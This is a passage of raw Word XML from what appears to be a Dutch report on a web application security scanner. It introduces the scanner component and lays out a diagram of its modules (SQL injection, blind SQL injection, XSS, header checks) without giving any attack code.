      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B87230" w14:textId="76706698" w:rsidR="009276BC" w:rsidRDefault="00C15EE7" w:rsidP="00251301">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252647424" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="768C9AF5" wp14:editId="0508A8B0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-903070</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-897890</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="527" name="Rectangle 5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36568" id="Rectangle 527" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.1pt;margin-top:-70.65pt;width:25pt;height:1031.7pt;z-index:-25066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CE7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&#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" fillcolor="#ffd966 [1943]" strokecolor="#ffd966" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B568D8">
        <w:t>4.5</w:t>
      </w:r>
      <w:r w:rsidR="00161972">
        <w:t xml:space="preserve">.3 </w:t>
      </w:r>
      <w:r w:rsidR="00251301">
        <w:t>Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A842C46" w14:textId="17954EC0" w:rsidR="008A7A38" w:rsidRDefault="008A7A38" w:rsidP="00251301"/>
    <w:p w14:paraId="33BFFC1E" w14:textId="6A5D63BF" w:rsidR="008A71DB" w:rsidRPr="008A71DB" w:rsidRDefault="008A71DB" w:rsidP="00BC2930">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="008A71DB">
        <w:t>Introductie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C4DD05" w14:textId="6F91C4AE" w:rsidR="008166B7" w:rsidRDefault="001074BF">
      <w:r>
        <w:t xml:space="preserve">In dit </w:t>
      </w:r>
      <w:r w:rsidR="000E476C">
        <w:t>deel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> zal ik </w:t>
      </w:r>
      <w:r w:rsidR="00782F0C">
        <w:t>het concept van de s</w:t>
      </w:r>
      <w:r w:rsidR="00BB19DC">
        <w:t>canner ui</w:t>
      </w:r>
      <w:r w:rsidR="00582D8E">
        <w:t>tgebreid behandelen met als doel</w:t>
      </w:r>
      <w:r w:rsidR="00773B4A">
        <w:t xml:space="preserve"> om</w:t>
      </w:r>
      <w:r w:rsidR="00BB19DC">
        <w:t xml:space="preserve"> op een begrijpelij</w:t>
      </w:r>
      <w:r w:rsidR="008E36CF">
        <w:t xml:space="preserve">ke manier uit te leggen hoe de </w:t>
      </w:r>
      <w:r w:rsidR="0033771C">
        <w:t>scanner</w:t>
      </w:r>
      <w:r w:rsidR="00BB19DC">
        <w:t xml:space="preserve"> in zijn werking gaat.</w:t>
      </w:r>
      <w:r w:rsidR="00B34E8A">
        <w:t xml:space="preserve"> De s</w:t>
      </w:r>
      <w:r w:rsidR="00914DCE">
        <w:t>canner</w:t>
      </w:r>
      <w:r w:rsidR="0037570A">
        <w:t xml:space="preserve"> is een fundamentele component</w:t>
      </w:r>
      <w:r w:rsidR="00914DCE">
        <w:t xml:space="preserve"> van de </w:t>
      </w:r>
      <w:r w:rsidR="00CE31AF">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>ebapplicatie scanner</w:t>
      </w:r>
      <w:r w:rsidR="006F77C7">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00713210">
        <w:t>De s</w:t>
      </w:r>
      <w:r w:rsidR="009B5949">
        <w:t>canner is de</w:t>
      </w:r>
      <w:r w:rsidR="00D85FBA">
        <w:t xml:space="preserve"> component dat de gesimuleerde aanvallen verricht op het gekozen doelwit</w:t>
      </w:r>
      <w:r w:rsidR="00F74479">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="003F1A70">
        <w:t xml:space="preserve">In het </w:t>
      </w:r>
      <w:r w:rsidR="003334E9">
        <w:t>deel</w:t>
      </w:r>
      <w:r w:rsidR="003F1A70">
        <w:t xml:space="preserve"> hiervoor (H 4.4, Crawler)</w:t>
      </w:r>
      <w:r w:rsidR="00667D73">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003158F8">
        <w:t xml:space="preserve">heb ik </w:t>
      </w:r>
      <w:r w:rsidR="00AD7303">
        <w:t>be</w:t>
      </w:r>
      <w:r w:rsidR="00485C5F">
        <w:t>handeld wat voor soort data de c</w:t>
      </w:r>
      <w:r w:rsidR="00AD7303">
        <w:t xml:space="preserve">rawler verwerkt en gestructureerd opslaat in de database. </w:t>
      </w:r>
      <w:r w:rsidR="00982271">
        <w:t>Deze data wordt door de s</w:t>
      </w:r>
      <w:r w:rsidR="00A547CB">
        <w:t>canner gebruikt om de gesimu</w:t>
      </w:r>
      <w:r w:rsidR="00F774C7">
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="00761222">
        <w:t>eerde aanvallen uit te voeren.</w:t>
      </w:r>
      <w:r w:rsidR="008166B7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001C74FA">
        <w:t>Voordat ik begin met het behan</w:t>
      </w:r>
      <w:r w:rsidR="004A2F67">
        <w:t>delen van de soort data dat de s</w:t>
      </w:r>
      <w:r w:rsidR="001C74FA">
        <w:t>canner gebruikt z</w:t>
      </w:r>
      <w:r w:rsidR="00FB17D4">
        <w:t>al ik eerst de basis uitleggen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198C2705" w14:textId="401CF691" w:rsidR="00B63048" w:rsidRDefault="00C05EAE">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252648448" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="39473B8C" wp14:editId="6CA09266">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-14605</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1812290</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5655310" cy="2971800"/>
                <wp:effectExtent l="0" t="0" r="34290" b="25400"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21600"/>
                    <wp:lineTo x="21634" y="21600"/>
                    <wp:lineTo x="2163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655310" cy="297180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AAB81" id="Rectangle 5" o:spid="_x0000_s1026" style="position:absolute;margin-left:-1.15pt;margin-top:142.7pt;width:445.3pt;height:234pt;z-index:25264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" fillcolor="#ffd966" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006D751D">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252667904" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7F352F75" wp14:editId="79C19C95">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>370205</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4327525</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1075690" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="16510" b="38100"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="169" name="Text Box 169"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1075690"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29E1887" w14:textId="6D6B5864" w:rsidR="002A05E5" w:rsidRPr="006D751D" w:rsidRDefault="002A05E5" w:rsidP="006D751D">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00AE06B5">
                              <w:t>Basis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52F75" id="Text Box 169" o:spid="_x0000_s1121" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:29.15pt;margin-top:340.75pt;width:84.7pt;height:27pt;z-index:25266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" filled="f" strokecolor="#ffc000 [3207]" strokeweight="2.25pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="129E1887" w14:textId="6D6B5864" w:rsidR="002A05E5" w:rsidRPr="006D751D" w:rsidRDefault="002A05E5" w:rsidP="006D751D">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00AE06B5">
                        <w:t>Basisfuncties</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006D751D">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252665856" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="66B6F339" wp14:editId="63709180">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>497205</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2155190</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="888365" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="26035" b="38100"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="163" name="Text Box 163"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="888365"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9EC273" w14:textId="44A568CC" w:rsidR="002A05E5" w:rsidRPr="006D751D" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Basis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6F339" id="Text Box 163" o:spid="_x0000_s1122" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:39.15pt;margin-top:169.7pt;width:69.95pt;height:27pt;z-index:25266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" filled="f" strokecolor="#ffc000 [3207]" strokeweight="2.25pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3F9EC273" w14:textId="44A568CC" w:rsidR="002A05E5" w:rsidRPr="006D751D" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Basis module</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00C844E3">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252664832" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="423511EE" wp14:editId="1C381D82">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>878840</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3070225</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="0" cy="571500"/>
                <wp:effectExtent l="50800" t="50800" r="76200" b="12700"/>
                <wp:wrapNone/>
                <wp:docPr id="161" name="Straight Arrow Connector 16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B3B8C" id="Straight Arrow Connector 161" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;margin-left:69.2pt;margin-top:241.75pt;width:0;height:45pt;flip:y;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" strokecolor="#4472c4 [3204]" strokeweight="2.25pt">
                <v:stroke endarrow="block" joinstyle="miter"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="005A5D92">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252663808" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6BD42927" wp14:editId="23EA18DF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>240030</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3637280</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1397000" cy="571500"/>
                <wp:effectExtent l="0" t="0" r="25400" b="38100"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="144" name="Text Box 144"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1397000" cy="57150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AFFC00C" w14:textId="08F245F9" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>attackGet</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7BB266D1" w14:textId="45561940" w:rsidR="002A05E5" w:rsidRPr="005A5D92" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>attack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42927" id="Text Box 144" o:spid="_x0000_s1123" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:18.9pt;margin-top:286.4pt;width:110pt;height:4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" fillcolor="#ffc000 [3207]" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0AFFC00C" w14:textId="08F245F9" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>attackGet</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7BB266D1" w14:textId="45561940" w:rsidR="002A05E5" w:rsidRPr="005A5D92" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>attackPost</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00BB5A4C">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252662784" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="33CFE187" wp14:editId="607FC3B0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2783840</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3869055</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1143000" cy="454660"/>
                <wp:effectExtent l="0" t="0" r="25400" b="27940"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="134" name="Text Box 13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C77410" w14:textId="05947BBF" w:rsidR="002A05E5" w:rsidRPr="00DF1918" w:rsidRDefault="002A05E5" w:rsidP="00BB5A4C">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Head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FE187" id="Text Box 134" o:spid="_x0000_s1124" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:219.2pt;margin-top:304.65pt;width:90pt;height:35.8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" fillcolor="#ffc000 [3207]" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6BC77410" w14:textId="05947BBF" w:rsidR="002A05E5" w:rsidRPr="00DF1918" w:rsidRDefault="002A05E5" w:rsidP="00BB5A4C">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Header Module</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60736" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2BD47022" wp14:editId="34D677C2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2788285</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3180080</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1143000" cy="454660"/>
                <wp:effectExtent l="0" t="0" r="25400" b="27940"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="572" name="Text Box 57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CD4D9B" w14:textId="2F546F81" w:rsidR="002A05E5" w:rsidRPr="00DF1918" w:rsidRDefault="002A05E5" w:rsidP="00DF1918">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>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47022" id="Text Box 572" o:spid="_x0000_s1125" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:219.55pt;margin-top:250.4pt;width:90pt;height:35.8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" fillcolor="#ffc000 [3207]" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="2DCD4D9B" w14:textId="2F546F81" w:rsidR="002A05E5" w:rsidRPr="00DF1918" w:rsidRDefault="002A05E5" w:rsidP="00DF1918">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>XSS</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8688" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="361E34CF" wp14:editId="6B837931">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2788285</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2608580</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1143000" cy="454660"/>
                <wp:effectExtent l="0" t="0" r="25400" b="27940"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="552" name="Text Box 55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6BE4F6" w14:textId="5546811A" w:rsidR="002A05E5" w:rsidRPr="00DF1918" w:rsidRDefault="002A05E5" w:rsidP="00DF1918">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Blind SQL Inj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E34CF" id="Text Box 552" o:spid="_x0000_s1126" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:219.55pt;margin-top:205.4pt;width:90pt;height:35.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" fillcolor="#ffc000 [3207]" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="156BE4F6" w14:textId="5546811A" w:rsidR="002A05E5" w:rsidRPr="00DF1918" w:rsidRDefault="002A05E5" w:rsidP="00DF1918">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Blind SQL Injectie</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6640" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="261F85AB" wp14:editId="33DD3B13">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2783205</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2040890</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1143000" cy="454660"/>
                <wp:effectExtent l="0" t="0" r="25400" b="27940"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="544" name="Text Box 54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7F90BC1" w14:textId="5565EA11" w:rsidR="002A05E5" w:rsidRPr="00DF1918" w:rsidRDefault="002A05E5" w:rsidP="00DF1918">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>SQL Inj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F85AB" id="Text Box 544" o:spid="_x0000_s1127" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:219.15pt;margin-top:160.7pt;width:90pt;height:35.8pt;z-index:2526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" fillcolor="#ffc000 [3207]" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="17F90BC1" w14:textId="5565EA11" w:rsidR="002A05E5" w:rsidRPr="00DF1918" w:rsidRDefault="002A05E5" w:rsidP="00DF1918">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>SQL Injectie</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="004937E2">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252655616" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5FCDBC55" wp14:editId="7373376F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1641275</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2842693</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1142566" cy="570431"/>
                <wp:effectExtent l="0" t="0" r="26035" b="39370"/>
                <wp:wrapNone/>
                <wp:docPr id="508" name="Elbow Connector 508"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1142566" cy="570431"/>
                        </a:xfrm>
                        <a:prstGeom prst="bentConnector3">
                          <a:avLst>
                            <a:gd name="adj1" fmla="val 51205"/>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2A23D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08" o:spid="_x0000_s1026" type="#_x0000_t34" style="position:absolute;margin-left:129.25pt;margin-top:223.85pt;width:89.95pt;height:44.9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" adj="11060" strokecolor="#4472c4 [3204]" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="004937E2">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252653568" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="59E1D30A" wp14:editId="2A93EA10">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1641274</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2841625</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1142566" cy="1704"/>
                <wp:effectExtent l="0" t="0" r="26035" b="49530"/>
                <wp:wrapNone/>
                <wp:docPr id="489" name="Straight Arrow Connector 489"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm flipV="1">
                          <a:off x="0" y="0"/>
                          <a:ext cx="1142566" cy="1704"/>
                        </a:xfrm>
                        <a:prstGeom prst="straightConnector1">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442D5" id="Straight Arrow Connector 489" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;margin-left:129.25pt;margin-top:223.75pt;width:89.95pt;height:.15pt;flip:y;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" strokecolor="#4472c4 [3204]" strokeweight="2.25pt">
                <v:stroke joinstyle="miter"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="004937E2">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252650496" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7325C69D" wp14:editId="7D36637F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1641274</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2270125</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1142566" cy="575544"/>
                <wp:effectExtent l="0" t="0" r="26035" b="34290"/>
                <wp:wrapNone/>
                <wp:docPr id="58" name="Elbow Connector 58"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm flipV="1">
                          <a:off x="0" y="0"/>
                          <a:ext cx="1142566" cy="575544"/>
                        </a:xfrm>
                        <a:prstGeom prst="bentConnector3">
                          <a:avLst>
                            <a:gd name="adj1" fmla="val 51264"/>
                          </a:avLst>
                        </a:prstGeom>
